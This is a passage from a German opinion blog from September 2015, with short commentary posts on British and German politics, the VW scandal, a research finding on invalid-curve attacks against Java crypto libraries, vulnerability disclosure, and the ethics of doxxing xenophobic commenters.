[l] Der Spindoktor für Gordon Brown sagt, dass es im Cameron-Fall anscheinend nichts zu spinnen gab, sonst hätte es selbstverständlich sofort ein Dementi gegeben. Er beschreibt sogar den Textbaustein, den man für solche Dementis nimmt:
This disgusting story is a complete and utter fabrication, and casts huge doubt on the credibility of all the other allegations in this book
Er beschreibt ganz lustig, wie man bei solchen Anschuldigungen dann den Chef anruft, und fragt, was denn die Wahrheit ist. Und wenn der Chef dann rumpoltert, was das für einen Frechheit sei, dann atmet er aus und ist froh, weil er weiß, dass die Story Bullshit ist und er sie selbstbewusst dementieren kann. Seine einzige Erklärung dafür, dass es dieses Dementi nicht gab, ist, dass die Story dann wohl wahr sein muss, und alle weiteren Fakten sie nur noch schlimmer gemacht hätten.
[l] Lacher des Tages: Jeb Bush so: Der Papst soll mal die Schnauze halten bzgl Klimawandel, der ist kein Wissenschaftler.
Das ist gleich doppelt großartig, denn erstens ist "I'm not a scientist, but…" bei den Republikanern bei allen Aussagen zum Klimawandel dabei, da haben Leute schon Trinkspiele draus gemacht. Und zweitens hat der Papst mehr Wissenschafts-Street-Cred als Jeb Bush :-)

Wed Sep 23 2015

[l] Merkel drückt Schröder noch mal einen Giftdolch zwischen die Rippen:
Bei der Vorstellung des Buches "Gerhard Schröder - Die Biografie" des Historikers Gregor Schöllgen sagte Merkel am Dienstag in Berlin, Schröder habe sich [mit der Agenda 2010] um Deutschland verdient gemacht. Dass die Bundesrepublik heute wirtschaftlich so stark dastehe, habe ohne jeden Zweifel seinen Ausgang in den damaligen Sozialreformen.
[l] Sagten wir 500.000 Autos? Wir meinten 11 Millionen Autos!
Oh und dann gibt es in Brasilien (!) anscheinend noch eine Zivilklage ehemaliger Mitarbieter wegen Folter (!!). Wait, what?!
VW habe in den Jahren 1964 bis 1985 die Folter und illegale Festnahme von Mitarbeitern hingenommen, begründete demnach das Arbeiterforum für Wahrheit, Gerechtigkeit und Reparation seine Klage in São Paulo.
Ja, äh, was ist denn die Alternative?
Update: Macht euch keine Sorgen, VW fixt das jetzt. Sie haben die BP-Anwälte von Deepwater-Horizon angeheuert. Na ob DAS das richtige Signal war an der Stelle…
Update: Die Frage ist, ob was VW gemacht hat mit dem vergleichbar ist, was Daimler in Argentinien gemacht hat. War VW eine Firma, die da Business gemacht hat, und dann hat die Regierung illegal ihre Mitarbeiter festgenommen? Oder hat VW der Regierung gesagt: Hört mal, die Gewerkschaftler hier, die müssen mal weg, die machen uns Ärger?

Mon Sep 21 2015

[l] Kennt ihr Black Mirror? Eine hervorragende (ich kann das gar nicht überbetonen) dystopische britische Scifi-Serie von Charlie Brooker. Und wenn ihr den nicht kennt, dann schaut euch das Video hier an. Der Typ. Von dem findet man eine ganze Reihe von Videos auf Youtube und co. Die lohnen sich so gut wie alle.
So, und dieser fiese Zyniker hat eine Dark Scifi Show namens Black Mirror gemacht, bei der jede Folge für sich genommen eine völlig unabhängige Geschichte erzählt. Ein bisschen wie Twilight Zone, falls ihr das kennt. Nur mit modernerer Technik und weitgehend ohne Voodoo-Bullshit, alles Dinge, die man sich so tatsächlich vorstellen könnte. Es geht, wie bei allem guten Scifi, nicht um die Technologie oder die tatsächlichen Errungenschaften, sondern um die Dinge, die kulturell und gesellschaftlich falsch gegangen sind. Einige Male stellt eine Folge eines steile These auf und folgt der dann einfach, und am Ende braucht man ein-zwei Tage, um die Folge zu verdauen.
Ich spreche das an, weil eine der Folgen von der Frage handelt, was in unserer mediengeilen PR-Welt passieren würde, wenn ein medientechnisch geschickt vorgehender Perverser eine hochbeliebte Prinzessin aus der Royal Family entführen würde, und dann öffentlich vom Premierminister verlangt, dass er es vor laufender Kamera, live übertragen, mit einem Schwein treibt. Und wie bei einem Auffahrunfall in Slow Motion läuft es dann genau so ab, wie man sich das vorstellen würde. Von "darüber denken wir nicht mal nach" geht es schleichend über "ja aber die Umfragewerte" und "wer würde den Typen nochmal wählen, der am Tod von Princess Diana (das ist offensichtlich das Vorbild hier) Schuld hat?". Am Ende framen sie es als "für das größere Gute", wenn er es macht, für die Partei und das Vaterland, und ist ein Leben nicht mehr wert als dein Ego? Das Finale ist das seelenzerfressenste Stück Film, das ich je gesehen habe.
Wieso erwähne ich das gerade? Weil eine unautorisierte Biographie eines Cameron-Haters, unter Berufung auf eine nicht namentlich genannte Quelle, behauptet, Cameron habe in seiner Studienzeit sehr private Dinge mit dem Kopf eines toten Schweines getan. Hier ist Buzzfeed-Interview mit Charlie Brooker dazu.
Das perfide ist ja, dass das auf der einen Seite natürlich gänzlich unglaubwürdig ist. Auf der anderen Seite gab es aber diesen monströsen Kindesmissbrauchs-Skandal um das Parlament, und schwul ist ja heute kein Kompromat mehr, … da stand also schon die Frage im Raum, was für ein furchtbares Kompromat wohl in dem Koffer sein mag, der die Konservativen zusammenschweißt.
Auf Twitter gibt es natürlich jetzt einen Haufen an passendem Humor unter #piggate und #hameron. Anders als mit kruden Photoshops kann man so eine Situation auch gar nicht verarbeiten.
Update: Anscheinend gibt es ein Foto des Vorfalls.

Fri Sep 18 2015

[l] Zum Katastrophenschutz kommt hier noch ein längerer Kommentar:
Das stimmt so nicht ganz. Der Katastrophenschutz ist, soweit ich das jetzt im Kopf habe, in allen Bundeslängern an die Landkreis-Ebene delegiert. Der Bund und die Länder machen zwar z.T. die Vorgaben und Finanzieren einen Anteil. Die Aufstellung und der Einsatz obliegt aber, wenn wir wirklich von einer Katastrophe sprechen, (zumindest in Hessen) dem sogenannten "Hauptverwaltungsbeamten", also dem Landrat bzw. Oberbürgermeister, die offiziell die Katastrophe feststellen müssen um die Einheiten in den Einsatz zu bringen.
Das hat bisher, soweit ich das mitbekommen habe, noch keiner gemacht.
Der Grund dürfte die Kosten sein: Wenn der Landkreis "bestellt", bezahlt er auch. Arbeitsausfallentschädigungen und ähnliches inklusive.
Und aktuell ist das Problem (wieder auf Hessen bezogen) ein Problem der Regierungspräsidien, die für die Aufnahmeeinrichtungen zuständig sind.
Wieso sollte also aktuell ein Landkreis selbstständig die Entscheidung treffen, dass eine höhere Behörde eine Katastrophe verursacht, um diese auf eigene Kosten zu beheben? Also aus Landkreis-Sicht gesehen…
Deshalb setzt man aktuell Einheiten der Hilfsorganisationen nur im Rahmen unterhalb der Katastrophe, also im Bereich der Hilfeleistung, ein. Zum Teil werden die HiOrgs auch dafür bezahlt, als Dienstleister quasi. Oder man nutzt die Einheiten zur kurzfristigen Unterstützung z.B. bei der Essensversorgung.
Im Katastrophenschutz gibt es noch einen Anteil vom Bund, den man aktuell komplett neu aufstellt: Die Medical Taskforce (https://de.wikipedia.org/wiki/Medizinische_Task_Force). Die dürften aber noch nicht so weit sein, dass man da irgendwelche fertigen Einheiten alarmieren könnte. Aber man baut da eher neu auf als weiter abzureißen. Diese Einheit untersteht in Zukunft dann direkt der Kontrolle des Bundes (wie jetzt schon das THW).
Zusammengefasst: Es gibt massig ungenutzte Kapazitäten im Bereich des KatS, die z.B. bei einem hochgehenden AKW zum Einsatz kommen, aber eben nicht jetzt. Vermutlich weil niemand die Kosten für so etwas übernehmen will und die Einheiten zu einer anderen Verwaltungsebene gehören.
Blick in die Kristallkugel von mir: Wenn es Winter wird, werden wir in den Zelt- und Containerunterkünften die ersten Lagen bekommen, in denen die Landräte nicht mehr wegschauen können und den Schritt machen werden.
Hervorhebung von mir.

Tue Sep 15 2015

[l] Und noch eine Anekdote für euch:
aus eigenem Erleben eine Ergänzung: als Willy Brandt an die Regierung gewählt wurde, gab es eine Amnestie für "Demonstrationsstraftäter". Letzterer Begriff wurde durchaus recht weit gefasst. Meiner Erinnerung nach wurden etwa 10.000 begonnene Prozesse zu den Akten gelegt. Einige davon fanden gegen mich und Freunde statt. Ich erinnere mich, dass wir in Erwartung höherer Strafen und der damit verbundenen Ausgrenzung mehrheitlich mit einem bürgerlichen Leben abgeschlossen hatten und uns auf den Untergrund vorbereiteten. Die Amnestie hat die meisten von uns letztlich davon abgehalten. Einige haben anschließend erfolgreich Karriere in den politischen Institutionen gemacht.
Später, auch unter Brandt, wurde diese Reintegrationsstrategie allerdings durch die Berufsverbote konterkariert.
Man darf nicht vergessen, dass in dieser Zeit alle, außer Brandt und seinen direkten Unterstützern, die Ausgrenzung explizit betrieben. Die Bildzeitung vorneweg, aber nicht nur die: Aufrufe zum Verprügeln von "Langhaarigen Affen" wurden überall in Deutschland wörtlich genommen. "Verdächtige" wurden von sich zusammenrottenden "anständigen Bürgern" gemeinsam zusammengeschlagen. In Berlin z.B. wurde ein Angestellter, der Dutschke ähnlich sah, von mehreren hundert anständigen Bürgern mit "knüpft ihn auf"-Rufen durch die Straßen gejagt, bis er sich ausgerechnet in einen Polizei-Bulli retten konnte. Gerade in Berlin riefen SPD-ler dazu auf, die Stadt von den Extremisten zu reinigen (der Bürgermeister Klaus Schütz z.b.). Wer in dieser Bedrohungslage auch noch juristisch verfolgt wurde, der überlegte sich üblicherweise leicht, in den Untergrund zu gehen.
Intellektuelle wie Bloch, Böll, Mitscherlich, Mann forderten die Amnestie genau vor diesem Hintergrund.
Natürlich will ich dumpfe nationalistische Ressentiments und linke Opposition nicht in eins setzen. Die Gründe und Ziele sind verschieden. Es geht mir mit dem Beispiel nur um die Integrationsstrategie, die schließlich zu meinem und zum Leidwesen linker Politik über-erfolgreich war.
[l] Dan Bernstein erzählt ja seit ein paar Jahren, dass wir mal bei elliptischen Kurven (eines der letzten halbwegs stabil stehenden Fundamente moderne Public-Key-Kryptographie) aufpassen sollen, dass wir Kurven nehmen, bei denen man die Operationen nicht versehentlich verkacken kann. Da geht es um mehrere Dinge, die verkackt werden können. Erstens kann die Kurve selbst schon schlecht sein, also im Sinne von "da gibt es Abkürzungen beim Cracken von Keys, wenn man das Geheimnis kennt, dass die Spezifizierer der Kurve da heimlich eingebacken haben". Aber ich spiele jetzt auf etwas anderes an. Am besten guckt ihr euch die Folien oder das Video selber mal an.
Jedenfalls gab es da Kritik. Wie so häufig, wir hatten ja bei C ähnliche Vorschläge. "Hey, wenn wir dieses API hier besser machen, dann werden wir weniger Bugs haben". Und da kommen dann so Old Farts aus dem Unterholz und sagen "ihr infantilisiert C-Entwickler, die sind nicht so doof wie ihr sie hier darstellt". Aber am Ende des Tages geben die Nummern dem eben Recht, lieber die Umgebung schon so zu machen, dass es leichter ist, alles richtig zu machen.
Ich erwähne das hier alles, weil sich rausstellt, dass djb natürlich mal wieder völlig Recht hatte. Natürlich gibt es Leute, die bei komplizierter Materie das falsch machen. Ich zitiere mal:
We evaluated 8 crypto libraries and their vulnerabilities to invalid curve attacks. We found out that the Bouncy Castle library and the Oracle JCE provider were vulnerable and we could extract private keys from the TLS servers running these libraries. The attacks are quite powerful. For Bouncy Castle, we needed about 3300 real server queries. For Oracle JCE, we needed about 17000 real server queries. We tested with the NIST-256 curve. The high number of requests needed for the Java servers results from a strange behaviour (bug?) in the Java EC computation.
Ich könnte jetzt ein paar Worte fallen lassen über Java und die ganzen Java-Apologeten, die mir seit Jahren Mails schreiben, dass mit Java alles besser ist als mit C. Aber ich lehne mich glaube ich lieber zurück und sage: Told you so. :-)
Dass wir uns da richtig verstehen: Wer mit Java ECC-Krypto gemacht hat, der muss jetzt neue Keys generieren. Und natürlich gucken, dass er eine gefixte Library irgendwo her kriegt. Aber hey, Oracle fixt ja schn… never mind.
[l] Zu der häuslichen Gewalt bei Lesben gab es mehrere Zuschriften. Eine Anekdote will ich mal zitieren, weil sie so völlig das Gegenteil meiner uninformierten Erwartungshaltung war:
Ich habe ein paar Jahre lang Türsteher in einer Disco gemacht, die einmal im Monat einen Lesben & Schwulen-Tag hatte. Bei Schwulen habe ich nie erlebt, daß sich Partner derart gezofft, oder sogar geprügelt hätten. Und das haben die dort anwesenden Kampflesben/Butches sogar quasi-öffentlich betrieben. Es gab nie einen Abend, an dem ich nicht - manchmal mit Hilfe anderer Gäste - dazwischen gehen musste. Gelegentlich wurde sogar der Notarzt gerufen, wegen Platzwunden, Schnittverletzungen durch Glasscherben, ausgerissenen Haarbüscheln, usw. So ein grobes Verhalten und beleidigendes Vokabular, wie bei den Butches, habe ich bei den normalen Discobesuchern am Wochenende nur selten erlebt - das war eine "Alternative Disco" und da liefen durchaus öfter mal gewaltbereite/extremistische Gestalten und durchgeknallte Drug-Addicts rum.
[l] Die NZZ hat mal eine schreckliche Bilderserie über Mauern und Zäune gemacht (Danke, Jan)
[l] Ich verstehe ja immer nicht, wie Leute "der Fefe hat Unrecht" sagen können, und dann glauben, mich damit geärgert zu haben.
Insbesondere nachdem ich gerade in einem langen Podcast erklärt habe, wie ich ticke. Für mich ist es intellektuell viel gewinnbringender, Unrecht zu haben, als Recht zu haben. Mein Ziel ist die persönliche Weiterentwicklung, die schrittweise Annäherung meines Wissens an die Wahrheit. Ich freue mich, wenn ich irgendwo Unrecht habe, das ist wie wenn ich einen Bug in Code finde!
Was mich viel mehr ärgert ist wenn so jemand dann nicht sagt, an welcher Stelle ich angeblich Unrecht habe. Das ist wie ein Bugreport "es funktioniert nicht". Damit garantiert der Bugmelder, dass der Bug nicht gefixt werden wird, und er gewinnt auch nichts. Im Gegenteil, der findet sich dann nur als ineffektiver Bugreporter und Heulsuse im ewigen Logfile der Geschichte wieder.
Zur Sendung 35 gab es vergleichsweise viel Feedback. Das finde ich interessant, weil wir im Vergleich zu anderen Sendungen diesmal fast ausschließlich Einschätzungen hatten und keine Fakten. Falsche Fakten kann man vergleichsweise einfach widerlegen, Einschätzungen sind Ansichtssache. Da muss man argumentiv ausholen, um eine Einschätzung als falsch zu entlarven, und noch mehr Aufwand ist nötig, wenn man den Gegenüber auch noch überzeugen will, dass er stattdessen die eigene Einschätzung übernehmen soll.
Der Großteil des bisherigen Feedbacks war positiv, aber es gibt auch negatives Feedback. Das zeichnet sich jetzt aber nicht dadurch aus, die argumentative Basis unserer Einschätzungen angreifen zu wollen, sondern da kommt Schmähkritik gepaart mit Unterstellungen und Behauptungen. Unterstellungen wie "Fefe sagt, Nazis sind arme Schweine und man dürfe Nazis nicht böse sein". Behauptungen wie "die Nazis müssen ausgegrenzt werden, reden ist sinnlos".
Ich sage nicht, alle Nazis seien arme Schweine. Ich sage, die in diesem einen Tumblr als Nazi angeprangerten Ausländerfeinde sind zu dem Teil, den ich gesehen habe, arme Schweine. Über die Nazis an sich habe ich nicht genug Erkenntnisse und könnte höchstens Vermutungen anstellen, keine Behauptungen. Ich sage auch nicht, man dürfe Nazis nicht böse sein. Ich sage, man dürfe ~~sozial~~ ökonomisch Schwachen nicht böse sein, wenn sie Angst vor dem Verlust ihres sozialen Status haben, und sich dann irgendwelchen rechten Gruppierungen anschließen, die ihnen Heilsversprechungen machen. Wenn wir solchen Gruppierungen gegenüber keine Argumente sondern nur Ausgrenzung anzubieten haben, und ~~sozial~~ Schwachen gegenüber nicht argumentieren können, wieso Pegida doof ist, sondern nur "das sind schlechte Menschen" haben, dann dürfen wir uns in der Tat nicht wundern, wenn Pegida Zulauf hat.
Zu der Behauptung, Nazis müssten ausgegrenzt werden, Reden sei sinnlos. Das mag sein. Ich könnte mich dem sogar anschließen, wenn ich das mal ordentlich begründet bekäme. Bekomme ich aber nicht. Nur weil eine Gruppe das immer und immer wieder, zunehmend lauter und schriller schreit, überzeugt mich die Aussage noch nicht.
Ich glaube sofort, dass es da draußen Leute gibt, die Argumenten nicht zugänglich sind. Ich habe das persönlich erlebt. In absoluten Zahlen häufiger bei Antifa als bei Nazis, aber das liegt daran, dass ich mehr Kontakt zu Antifa als zu Nazis hatte. Ihr müsst mal aufhören, andere Leute durch Brüllen überzeugen zu wollen. Mich schreckt das eher ab, als dass es mich auf eure Seite zieht. Mein Denkmuster ist: Wenn der so laut brüllen muss, dann hat er offensichtlich überhaupt keine inhaltlichen Argumente, sonst würde er ja die bringen, und dann müsste er nicht brüllen.
Wenn mir dann noch unterstellt wird, ich hätte behauptet, das Naziproblem sei aufgebauscht, dann sind wir nicht mehr weit von ebenso faktenbasisfreien Antisemitismusvorwürfen entfernt, und dann guck ich schon mal aus dem Fenster, ob ich da schon die Fackeln und Mistgabeln sehe. Habt ihr wirklich so wenig in den Händen, dass ihr über die Position eures Gegenüber lügen müsst, um ihn besser angreifen zu können? Das würde mich zutiefst traurig machen, denn es hieße, dass ich mich im Gespräch mit euch nicht fortbilden und verbessern kann. Wenn ich mit Lügnern und Fundamentalisten einen Kompromiss suche, kann der nur unterhalb meines bisherigen Niveaus liegen.
Nun wird sicher dem einen oder anderen auffallen, dass das natürlich genau so für Gespräche mit Nazis gilt. Und bei denen habe ich ja gesagt, man muss da den Diskurs suchen. Damit die nicht weiter abgleiten. So gesehen wäre das selbe Argument natürlich auch ein Argument dafür, mich weiter von Lügnern und Fundamentalisten beschimpfen und bespucken zu lassen, damit die nicht noch weiter abgleiten. Aber ich glaube, dass ich da lieber eine FAQ machen würde.
Übrigens endete die Kritik, auf die ich mich hier beziehe, mit diesen güldenen Worten (in Reaktion auf Kommentare Andersdenkender):
Ich finde aber, dass den Nazis, die es gibt, das Leben zur Hölle gemacht werden muss. Nicht nur vom Staat, jeder einzelne muss Nazis ausgrenzen. Kein Job, keine Bank, keine Freunde. Das wird sie nicht überzeugen, aber viele andere, die die Nazis dann sehen.
Ich weiß ja nicht, wie gut ihr im Geschichtsunterricht aufgepasst habt. Aber die Strategie haben wir in Deutschland schon mal gefahren. Berufsverbote gab es zu RAF-Zeiten. Der Radikalenerlass. Das richtet sich nicht gegen Nazis, sondern gegen Linke. Die DDR hatte das auch, die setzten schon bei der Bildung an. Wer nicht linientreu ist, kriegt unter Umständen keine Bildung. Und heute staunen wir, dass die Nazis in Sachsen einen geringen Bildungsstand haben. Berufsverbote waren auch ein Instrument der Entnazifizierung in der Besatzungszeit. Und das hat ja auch perfekt funktioniert, heute haben wir ja keine Nazis mehr, gell?
Oh und wisst ihr, wann wir noch Berufsverbote hatten? Bei den Nazis. Juden und Kommunisten durften keine Ärzte mehr sein, keine Rechtsanwälte, keine Künstler. In DER Tradition befindet man sich, wenn man Berufsverbote fordert. Sind die Nazis eigentlich so weit gegangen, den Juden Bankkonten zu verbieten? Ich erinnere mich nur daran, dass da enteignet wurde und im besetzten Ausland Limits vergeben wurden, wieviel die pro Tag abheben dürfen.
Naja, und wenn man denen die Freundschaft aufkündigt, dann nimmt man ihnen auch jede Hoffnung, sich von den Nazis wieder loszusagen. Die Leute aus dem rechten Milieu, die ich kenne, haben alle psychische Probleme. Depressionen, Minderwertigkeitsgefühle, ein Gefühl der Ausgrenzung, des mangelnden Respekts durch den Rest der Gesellschaft, der Gängelei durch Behörden und so weiter. Die sind zu den Rechten gegangen, weil die ihnen ein Gefühl der Verbundenheit und Kameradschaft angeboten haben, und einen gemeinsamen Feind. Wenn die Mainstream-Gesellschaft solche persönlichen Notlagen gar nicht erst entstehen lassen würde, oder den Betroffenen in ihrer (tatsächlichen oder eingebildeten) Not bei der Seite stehen würde, gäbe es meiner Meinung nach auch keine rechte Ideologie in bedrohlichem Umfang in diesem Land. Ein paar Spinner wird es immer geben.
Update: Ich spreche mich übrigens auch nicht direkt gegen Ausgrenzung von Nazis aus. Ich würde in meinem Umkreis sicher keine dulden wollen. Aber wie bei allen Dingen, die man tut, muss man mal eine Analyse wagen, ob das jetzt eigentlich gut oder schlecht ist. Und gelegentlich muss man seine Komfortzone auch mal verlassen und mit Menschen reden, die einem widerlich sind. Und sei es nur aus Eichungsgründen.
Update: Wie Hagen Rether sehr richtig sagt, ist "sozial schwach" ein Kampfbegriff der Neocons und ich sollte lieber ökonomisch schwach schreiben.
Update: Der Teil über die Berufsverbote in der DDR war falsch formuliert. Es ist nicht so, dass man da automatisch nur als linientreues Parteimitglied in den Genuss von Bildung kam, aber man musste als Heretiker das Risiko in Kauf nehmen, keinen Studienplatz / keine Ausbildung zu kriegen.

Mon Sep 14 2015

[l] Tony Abbott verliert seinen Premierministerposten. Das ist dieser Geisterbahn-Kandidat, der in den letzten Jahren Australien zur Lachnummer gemacht hat mit seinem Kampf gegen die Anerkennung der Existenz des Klimawandels. (Danke, Robert)
[l] Ich habe mich neulich über einen Nazi-Doxxen-Tumblr schockiert gezeigt. Heute kam eine Mail der Betreiber rein, die ich euch mal zeigen möchte:
wir haben hier zur Kenntnis genommen, dass Du moralische Bedenken hast bei dem, was wir so machen.
Keine Sorge, die haben wir auch. Aus dem Grund haben wir die Veröffentlichungen von Rechercheergebnissen unserer Nutzer zu den im Blog genannten Personen auch wieder eingestellt. Uns ist aufgefallen, dass der Fokus ziemlich von unserem Projekt abdriftet, wenn wir uns zu sehr darauf einschießen, eine Hexenjagd auf Arbeitgeber zu veranstalten. Wir vermerken weiterhin den Arbeitgeber am Posting, wenn er im Profil des Users öffentlich ersichtlich ist, aber keine Rechercheergebnisse von unseren Lesern, die über x Umwege den Arbeitgeber erfahren haben. Das ist für uns ein Mittelweg mit dem wir leben können.
Zu den Falschmeldungen: Es gab mittlerweile tatsächlich Fälle, in denen danebengeschossen wurde. Das war z,.B. der Fall bei einer Arztpraxis, die von einem neuen Betreiber übernommen wurde und bei dem die Verfasserin des Hasspostings entgegen der Angaben in ihrem Profil gar nicht mehr beschäftigt war. Wir vermerken sowas dann, können aber im Zweifel die Veröffentlichung im Internet nicht wieder "einfangen".
Grundsätzlich sind Arbeitgeber aber sehr interessiert an unserem Blog. Wir hatten so bereits mehrere Anfragen größerer Konzerne, ob wir über eine Datenbasis verfügen, mit der wir automatisch deren Mitarbeiter abgleichen könnten. Haben wir abgelehnt, war uns zu heftig, zu bedenklich.
In Kontakt stehen wir auch z.B. mit einem großen Autobauer, dessen Konzernsicherheit uns darum gebeten hat, bei Auffälligkeiten eben einen Hinweis zu geben. Unternehmen scheinen also sehr wohl interessiert daran, keine Nazis bei sich zu beschäftigen.
Um zum eigentlichen Anlass dieser Mail zu kommen:
Mittlerweile finden sich Leute zusammen, die Facebook ans Leder wollen. Konkret versucht zur Zeit ein Anwalt, Facebook zur Löschung zu bewegen und bei Nichtreaktion Facebook entsprechend rechtlich zu belangen. Interessanter Ansatz und sicherlich ein Riesenerfolg für die PR der Kanzlei. Wir machen da allerdings trotz mehrerer Anfragen nicht mit.
Sie haben mir noch eine Mail der Kanzlei angehängt, aber die publiziere ich hier nicht, weil das ja auch eine Art von Doxxen wäre.
Ich freue mich sehr, dass denen klar ist, in was für Fahrwassern sie sich bewegen, und dass sie da offensichtlich nicht nur zu reflektieren bereit sind, sondern sie erkennen auch, wenn sie Fehler machen, und korrigieren dann. Vielleicht kommen wir so am Ende doch zu einer für alle akzeptablen Lösung.
Ich habe ja mal Usenet-Postings archiviert auf meiner Webseite, vor vielen vielen Jahren. Nicht völlig willkürlich, sondern eine Art Best Of der dämlichsten Postings. Mit Ansage, übrigens. Wenn ihr hier Kram postet, dann müsst ihr damit rechnen, dass euch das in zehn Jahren eure Aussichten auf einen Job kaputtmacht. Es gab damals schon Dejanews, später hat Google deren Archiv gekauft und weiterbetrieben. Die Postings waren also eh schon alle archiviert. Und es handelte sich um Usenet-Postings, also öffentliche Äußerungen. Ich hatte daher wenig Unrechtsbewusstsein.
Jahre später (so 10 Jahre oder so) kam dann ein Typ an und kriegte wirklich keinen Job, weil die Personalabteilungen seinen Namen googelten und mein Archiv fanden, wo der sich mit Anlauf und wiederholt zur Kartoffel gemacht hatte. Und der flehte mich an, das wegzumachen. Ich habe dann mein ganzes Archiv weggemacht, also auch die Postings anderer Leute. Ich bin habe das aber bis heute noch nicht abschließend mit mir geklärt, ob das die richtige Entscheidung war oder nicht. Auf der einen Seite ist das ja das einzige Korrektiv, das man in Medien wie dem Usenet hat. Die Drohung, dass die Leute ihr Verhalten später bereuen könnten. Auf der anderen Seite weiß man ja im Usenet auch nicht, wer einem gegenüber sitzt. Ist das jetzt ein renitenter alter Sack, an Großrechnern sozialisiert, elitär bis zum Anschlag, ein Triebtäter, der sich im Recht wähnt? Oder ein pubertierender Jugendlicher in der Auflehnphase, der mit seinen Hormonen und Gefühlen gerade so überfordert ist, dass er aus Trotz Scheiße macht, obwohl ihm tief im Innern klar ist, dass er gerade Scheiße macht? Muss man da im Zweifelsfall für den Angeklagten entscheiden und die halt alle machen lassen und das aushalten? Ist keine einfache Frage.
Und spielt es in der materiellen Betrachtung der Frage eine Rolle, wenn ich so ein Archiv betreibe, ob die Arbeitgeber das von sich aus finden, oder ob ich denjenigen bei seinem Arbeitgeber anschwärze? Eigentlich nicht, oder?
Was ich sagen will: Das ist keine einfache Frage, und man darf sich das nicht zu einfach machen. Ich bin mir auch nicht 100% sicher, ob ich nicht vielleicht nur deswegen gegen diesen Tumblr war, weil ich innerlich nach Konsistenz mit meiner vorherigen Entscheidung strebe, mein Usenet-Archiv zu löschen.

Sun Sep 13 2015

[l] Lesetipp: Eine Kolumne in der Irish Times über die Neue Linke. Gleich schon der Anfang lohnt. Da beschreibt er, dass die Neocons jahrelang den Begriff "Realität" gepachtet hatten. Die haben einfach Dinge behauptet und real gemacht mit ihrer Definitionsmacht über die Medien und den öffentlichen Diskurs. Aber das funktioniert jetzt nicht mehr.
For those who’ve covered the rise and demise of the political generation that gave us the Iraq war, Guantánamo and Abu Ghraib, this sudden concern with what is, and is not, “real” is telling. For it was the Bush-Blair generation of politicians who derided their opponents as the “reality-based community”. Bush adviser Karl Rove famously told journalists: “We’re an empire now, and when we act, we create our own reality . . . We’re history’s actors . . . and you, all of you, will be left to just study what we do.”
Nothing demonstrates the scale and rapidity of the historical change we’re living through better than the sudden inability of politicians attached to the neoliberal project to do exactly this: to create reality. Once powerful people are becoming bystanders to reality.
[l] Wollt ihr mal sehen, wie so ein Flüchtlingslager in Jordanien aussieht? Hier gibt es ein Bild.
Update: Aus einer Mail dazu:
Das ist das derzeit größte in Jordanien, vielleicht sogar weltweit, heißt az-Zaatari und ist ein paar km von der syrischen Grenze entfernt. Das ist Jordaniens viertgrößte Stadt und hatte zeitweise 150000 Einwohner, also mehr als z.B. Heidelberg. Das wurde innerhalb weniger Wochen(!) aus dem buchstäblichen Nichts errichtet. Auf Google Earth kann man das mit der Funktion "Historische Bilder" sehr schön verfolgen: 32° 17.557'N 36° 19.661'E.
Beim Aufbau war das THW beteiligt, soll heißen, daß es dort eine Strom-, eine Trinkwasser-, Abwasser- und eine Mobiltelefonversorgung gibt. Die zentrale Hauptstraße wird "Champs-Elysees" genannt und verfügt über gemauerte Häuser mit vielen Geschäften. Es gibt Gemeinschaftsküchen, Schulen, Fußballplätze, usw. Diverse Hilfsorganisationen sind vor Ort wie z.B. Ärzte ohne Grenzen.
Beim Spiegel gab's mal was dazu: link
Und in der SZ: link
[l] Alternativlos 35 ist draußen. Es geht um Diskurskultur im Internet und um die Facebook-Löschdebatte. Ach naja, eigentlich geht es darum, dass Frank und ich uns mal ein paar Dinge von der Seele reden mussten :-)
Und wir sind auch sofort von der Realität überholt worden, denn wir haben das gestern aufgenommen und diskutiert, wie lange Schengen noch hält, und heute kommt dann die Meldung, dass Schengen "temporär" abgeschaltet wird. Ich hatte sowas schon befürchtet und daher das Schneiden diesmal in einer Hauruck-Aktion schnell selber gemacht, unter Vernachlässigung unsere üblichen Erdgeist-Qualitätsstandards, aber es hat trotzdem nicht gereicht.
Viel Spaß beim Hören!

Thu Sep 10 2015

[l] Wasser auf die Mühlen der Full-Disclosure-Fraktion bei Sicherheitslücken: Der Jeep-Hack neulich wurde noch gefixt, bevor er überhaupt öffentlich gemacht wurde. Aber vor fünf Jahren gab es einen ähnlichen Angriff, gegen GM, und den haben die Forscher nicht öffentlich gemacht damals. Ergebnis: GM brauchte fünf Jahre für den Fix. Ein halbes Jahrzehnt lang waren deren Kunden angreifbar und sie wussten es! Besonders perfide: Die Forscher damals hatten das auch an die Verkehrsbehörden geschickt, und die haben auch nicht dafür gesorgt, dass das schneller geht!
Das einzige, was gegen solche Hersteller hilft, ist wenn man gefundene Lücken schlicht öffentlich macht. Man kann ihnen ja ein-zwei Wochen für eine Reaktion geben, und dann von mir aus ein paar Wochen/Monate für einen Fix, je nach Größe des Problems. Aber dann muss das einfach veröffentlicht werden, und zwar mit Ansage von Anfang an. Damit da gar nicht erst irgendwelche Missverständnisse auftreten.
GM dachte anscheinend, sie können das Problem aussitzen, und die verwundbaren Modelle natürlich rausaltern lassen. Der Kapitalismus, wie er stinkt und kracht.
[l] Mir hat gerade jemand einen Link auf ein Tumblr-Blog gemailt, auf dem sie besonders ekelhafte ausländerfeindliche Äußerungen sammeln. Dann pixeln sie die Opfer weg und schreiben die Namen der Täter hin, stalken die online und doxxen die dann. Am Ende rufen dann Leute beim Arbeitgeber an, oder beim Sportclub, und sorgen dafür, dass die ihren Job und/oder ihren Freundeskreis verlieren.
Da wird mir ganz Angst und Bange, ehrlich gesagt.
Ich verlinke das jetzt absichtlich nicht, weil ich finde, dass das die Menschenwürde verletzt. Mein Verachten der Nazis beruht in wesentlichen Teilen darauf, dass ich mich ihnen moralisch überlegen fühle. Das träfe nicht mehr zu, wenn ich zu solchen Methoden griffe, um sie aus ihren Jobs rauszukanten.
Aber das wirft auch ein paar knifflige Fragen auf. Ist das legitim, wenn ein Chef jemanden für Dinge feuert, die derjenige zuhause außerhalb seiner Dienstzeit getan hat? Wenn ja: Woher soll er das wissen? Ist das seine Aufgabe, seine Mitarbeiter auf Facebook zu stalken? Müssen Chefs jetzt Denunziations-Postfächer unterhalten?
Ich bin mir da auch uneins, wo genau ich für mich die Grenzen ziehen würde.
